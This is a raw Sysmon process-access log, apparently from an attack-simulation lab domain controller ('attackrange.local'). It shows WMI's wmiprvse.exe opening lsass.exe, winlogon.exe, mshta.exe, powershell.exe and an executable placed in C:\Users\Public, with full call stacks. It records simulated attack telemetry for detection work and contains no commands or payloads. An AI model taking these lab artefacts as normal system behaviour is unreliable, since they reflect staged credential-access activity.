15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 